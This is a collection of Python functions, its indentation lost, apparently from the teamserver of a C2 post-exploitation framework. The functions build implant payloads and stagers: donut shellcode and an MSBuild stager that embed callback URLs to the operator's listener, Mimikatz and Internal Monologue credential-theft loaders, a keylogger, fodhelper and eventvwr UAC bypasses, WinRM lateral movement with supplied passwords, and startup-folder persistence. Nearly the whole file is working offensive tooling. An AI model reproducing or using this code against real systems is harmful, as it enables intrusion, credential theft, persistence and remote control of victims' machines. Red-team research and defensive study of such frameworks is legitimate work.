def payload(self):
listener = ipc_server.publish_event(
Events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if listener:
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
donut_shellcode = donut.create(
file=get_path_in_package('core/teamserver/data/naga.exe'),
params=f"{guid};{psk};{c2_urls}",
arch=2
if self.options['Architecture']['Value'] == 'x64' else 1)
shellcode = shellcode_to_hex_byte_array(donut_shellcode)
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/excel4dcom.boo')
) as module_src:
src = module_src.read()
src = src.replace('SHELLCODE', shellcode)
src = src.replace('TARGET', self.options['Target']['Value'])
src = src.replace('ARCH',
self.options['Architecture']['Value'])
return src
else:
print_bad(
f"Listener '{self.options['Listener']['Value']}' not found!")
def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/naga.exe'),
'rb') as assembly:
with open(
get_path_in_package(
'core/teamserver/stagers/templates/msbuild.xml')
) as template:
guid = uuid.uuid4()
psk = gen_stager_psk()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
template = template.read()
template = template.replace('GUID', str(guid))
template = template.replace('PSK', psk)
template = template.replace('URLS', c2_urls)
template = template.replace("NAME_GOES_HERE",
gen_random_string_no_digits(5))
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly.read()))
return guid, psk, template
def gen_encrypted_stage(self, comms):
stage = gen_stager_code(comms)
stage_file = BytesIO()
with open(get_path_in_package('core/teamserver/data/Boo.Lang.dll'),
'rb') as boolangdll:
with open(
get_path_in_package(
'core/teamserver/data/Boo.Lang.Compiler.dll'),
'rb') as boolangcompilerdll:
with open(
get_path_in_package(
'core/teamserver/data/Boo.Lang.Parser.dll'),
'rb') as boolangparserdll:
with open(
get_path_in_package(
'core/teamserver/data/Boo.Lang.Extensions.dll'
), 'rb') as boolangextensionsdll:
with ZipFile(stage_file,
'a',
compression=ZIP_DEFLATED,
compresslevel=9) as zip_file:
zip_file.writestr("Boo.Lang.dll",
boolangdll.read())
zip_file.writestr("Boo.Lang.Compiler.dll",
boolangcompilerdll.read())
zip_file.writestr("Boo.Lang.Parser.dll",
boolangparserdll.read())
zip_file.writestr("Boo.Lang.Extensions.dll",
boolangextensionsdll.read())
zip_file.writestr("Main.boo", stage)
return self.crypto.encrypt(stage_file.getvalue())
def payload(self):
with open(
get_path_in_package('core/teamserver/data/powerkatz_x86.dll'),
'rb') as powerkatz_x86:
with open(
get_path_in_package(
'core/teamserver/data/powerkatz_x64.dll'),
'rb') as powerkatz_x64:
with open(
get_path_in_package(
'core/teamserver/data/mimikatz_peloader.dll'),
'rb') as peloader:
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/mimikatz.boo')
) as module_src:
src = module_src.read()
src = src.replace(
"COMPRESSED_PE_x86",
dotnet_deflate_and_encode(powerkatz_x86.read()))
src = src.replace(
"COMPRESSED_PE_x64",
dotnet_deflate_and_encode(powerkatz_x64.read()))
src = src.replace(
"MIMI_PE_LOADER",
dotnet_deflate_and_encode(peloader.read()))
src = src.replace("MIMIKATZ_COMMAND",
self.options['Command']['Value'])
return src
def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/naga.exe'),
'rb') as assembly:
guid = uuid.uuid4()
psk = gen_stager_psk()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
arch = 3
# User can specify 64-bit or 32-bit
if self.options['Architecture']['Value'] == 'x64':
arch = 2
elif self.options['Architecture']['Value'] == 'x86':
arch = 1
donut_shellcode = donut.create(
file=get_path_in_package('core/teamserver/data/naga.exe'),
params=f"{guid};{psk};{c2_urls}",
arch=arch)
shellcode = shellcode_to_hex_string(donut_shellcode)
return guid, psk, shellcode
def payload(self):
with open(
get_path_in_package(
'core/teamserver/data/internalmonologue.dll'),
'rb') as dll:
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/internalmonologue.boo'
)) as module_src:
src = module_src.read()
src = src.replace("INTERNAL_MONOLOGUE_DLL",
dotnet_deflate_and_encode(dll.read()))
src = src.replace(
"impersonate=",
f"impersonate={self.options['Impersonate']['Value']}".
lower())
src = src.replace(
"threads=",
f"threads={self.options['Threads']['Value']}".lower())
src = src.replace(
"downgrade=",
f"downgrade={self.options['Downgrade']['Value']}".lower())
src = src.replace(
"restore=",
f"restore={self.options['Restore']['Value']}".lower())
src = src.replace(
"challenge=",
f"challenge=\"{self.options['Challenge']['Value']}\"".
lower())
src = src.replace(
"verbose=",
f"verbose={self.options['Verbose']['Value']}".lower())
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/unattendedinstallfiles.boo'
), 'r') as module_src:
src = module_src.read()
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/execute-assembly.boo')
) as module:
module = module.read()
assembly_path = os.path.expanduser(
self.options['Assembly']['Value'])
if not os.path.exists(assembly_path):
raise Exception("Assembly not found in specified path")
assembly_size = os.path.getsize(assembly_path)
with open(assembly_path, 'rb') as assembly:
module = module.replace(
"B64_ENCODED_COMPRESSED_ASSEMBLY",
dotnet_deflate_and_encode(assembly.read()))
module = module.replace("DECOMPRESSED_ASSEMBLY_LENGTH",
str(assembly_size))
boolang_string_array = ''
if self.options['Arguments']['Value']:
formatted_arguments = r', '.join([
fr"`{arg}`"
for arg in split(self.options['Arguments']['Value'])
])
boolang_string_array = f"= array(string, ({formatted_arguments}))"
module = module.replace("ASSEMBLY_ARGS", boolang_string_array)
print(module)
return module
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/domainusers.boo'),
'r') as module_src:
src = module_src.read()
src = src.replace("IDENTITY", self.options['Identity']['Value'])
src = src.replace("LDAP_FILTER",
self.options['LDAPFilter']['Value'])
src = src.replace("PROPERTIES",
self.options['Properties']['Value'].lower())
src = src.replace("UAC_FILTER", self.options['UACFilter']['Value'])
src = src.replace('SPN', str(self.options['SPN']['Value']).lower())
src = src.replace(
'DO_ALLOW_DELEGATION',
str(self.options['DoAllowDelegation']['Value']).lower())
src = src.replace(
'DISALLOW_DELEGATION',
str(self.options['DisallowDelegation']['Value']).lower())
src = src.replace('ADMINCOUNT',
str(self.options['AdminCount']['Value']).lower())
src = src.replace(
'TRUSTED_TO_AUTH',
str(self.options['TrustedToAuth']['Value']).lower())
src = src.replace(
'PREAUTH_NOT_REQUIRED',
str(self.options['PreauthNotRequired']['Value']).lower())
src = src.replace('FIND_ONE',
str(self.options['FindOne']['Value']).lower())
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/domaincomputers.boo'),
'r') as module_src:
src = module_src.read()
src = src.replace("IDENTITY", self.options['Identity']['Value'])
src = src.replace("LDAP_FILTER",
self.options['LDAPFilter']['Value'])
src = src.replace("PROPERTIES",
self.options['Properties']['Value'].lower())
src = src.replace("UAC_FILTER", self.options['UACFilter']['Value'])
src = src.replace(
'UNCONSTRAINED',
str(self.options['Unconstrained']['Value']).lower())
src = src.replace(
'TRUSTED_TO_AUTH',
str(self.options['TrustedToAuth']['Value']).lower())
src = src.replace('PRINTERS',
str(self.options['Printers']['Value']).lower())
src = src.replace('SPN', str(self.options['SPN']['Value']).lower())
src = src.replace('OPERATING_SYSTEM',
self.options['OperatingSystem']['Value'])
src = src.replace('SERVICE_PACK',
self.options['ServicePack']['Value'])
src = src.replace('SITE_NAME', self.options['SiteName']['Value'])
src = src.replace('FIND_ONE',
str(self.options['FindOne']['Value']).lower())
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/rick-astley.boo'),
'r') as module_src:
src = module_src.read()
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/alwaysinstallelevated.boo'
), 'r') as module_src:
src = module_src.read()
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/mcafeesitelistfiles.boo'),
'r') as module_src:
src = module_src.read()
return src
def payload(self):
with open(get_path_in_package('core/teamserver/modules/boo/src/getregistrykey.boo'), 'r') as module_src:
src = module_src.read()
src = src.replace('REGISTRY_HIVE', str(self.options['RegistryHive']['Value']).upper())
src = src.replace('REGISTRY_KEY', self.options['RegistryKey']['Value'])
src = src.replace('REGISTRY_VALUE', self.options['RegistryValue']['Value'])
return src
def __init__(self, teamserver):
self.teamserver = teamserver
self.modules = []
self.selected = None
super().__init__(
type="module",
paths=[get_path_in_package("core/teamserver/modules/boo/")])
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/dumpVaultCredentials.boo')
) as module_src:
src = module_src.read()
return src
def __init__(self, teamserver):
self.teamserver = teamserver
self.listeners = []
self.selected = None
ipc_server.attach(Events.GET_LISTENERS, self._get_listeners)
super().__init__(type="listener", paths=[get_path_in_package("core/teamserver/listeners/")])
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/modifiableservices.boo'),
'r') as module_src:
src = module_src.read()
return src
def get_comms(comms):
comms_section = StringIO()
comm_classes = []
for channel in comms:
for comm_file in os.listdir(
get_path_in_package("core/teamserver/comms/")):
if comm_file.endswith('.boo') and channel.strip().lower(
) == comm_file[:-4].lower():
comm_classes.append(f"{channel.strip().upper()}()")
with open(
os.path.join(
get_path_in_package("core/teamserver/comms/"),
comm_file)) as channel_code:
comms_section.write(channel_code.read())
return ", ".join(comm_classes), comms_section.getvalue()
def payload(self):
with open(get_path_in_package('core/teamserver/modules/boo/src/bypassUACfodhelper.boo'), 'r') as module_src:
src = module_src.read()
src = src.replace('BINARY', str(self.options['Binary']['Value']))
src = src.replace('ARGUMENTS', str(self.options['Arguments']['Value']))
src = src.replace('PATH', str(self.options['Path']['Value']))
return src
def generate(self, listener):
with open(get_path_in_package('core/teamserver/data/naga.exe'),
'rb') as exe:
guid = uuid.uuid4()
psk = gen_stager_psk()
return guid, psk, exe.read().decode('latin-1')
def payload(self):
stager = ipc_server.publish_event(Events.GET_STAGERS,
(self.options['Stager']['Value'], ))
listener = ipc_server.publish_event(
Events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if stager and listener:
if self.options['Stager']['Value'] == 'powershell':
stager.options['AsFunction']['Value'] = False
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/winrm.boo'),
'r') as module_src:
guid, psk, stage = stager.generate(listener)
ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
src = module_src.read()
src = src.replace('TARGET', self.options['Host']['Value'])
src = src.replace('USERNAME',
self.options['Username']['Value'])
src = src.replace('DOMAIN', self.options['Domain']['Value'])
src = src.replace('PASSWORD',
self.options['Password']['Value'])
src = src.replace(
'TRUSTED_HOSTS',
str(self.options['AddToTrustedHosts']['Value']).lower())
src = src.replace('PAYLOAD', stage)
return src
print_bad('Invalid stager/listener selected')
def payload(self):
with open(
get_path_in_package('core/teamserver/modules/boo/src/ls.boo'),
'r') as module_src:
src = module_src.read()
src = src.replace('PATH', self.options['Path']['Value'])
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/rdp.boo')) as module_src:
src = module_src.read()
src = src.replace('status', self.options['RDP_Status']['Value'])
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/mouseshaker.boo'),
'r') as module_src:
src = module_src.read()
src = src.replace('OFFSET', str(self.options['Offset']['Value']))
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/keylogger.boo'),
'r') as module_src:
src = module_src.read()
src = src.replace('MINUTES', self.options['Duration']['Value'])
return src
def payload(self):
with open(get_path_in_package('core/teamserver/modules/boo/src/startupfolderpersistence.boo'), 'r') as module_src:
src = module_src.read()
src = src.replace('COMMAND', self.options['Command']['Value'])
src = src.replace('ARGUMENTS', self.options['Arguments']['Value'])
src = src.replace('FILENAME', self.options['FileName']['Value'])
src = src.replace('STATUS', str(self.options['Status']['Value']).lower())
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/bypassUACEventVwr.boo'),
'r') as module_src:
src = module_src.read()
src = src.replace('PAYLOAD', str(self.options['Command']['Value']))
return src
def payload(self):
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/impersonateprocess.boo'),
'r') as module_src:
src = module_src.read()
src = src.replace('PROCESS_ID', self.options['ProcessID']['Value'])
return src
def __init__(self, teamserver):
self.teamserver = teamserver
self.selected = None
ipc_server.attach(Events.GET_STAGERS, self._get_stagers)
super().__init__(
type="stager",
paths=[get_path_in_package("core/teamserver/stagers/")])
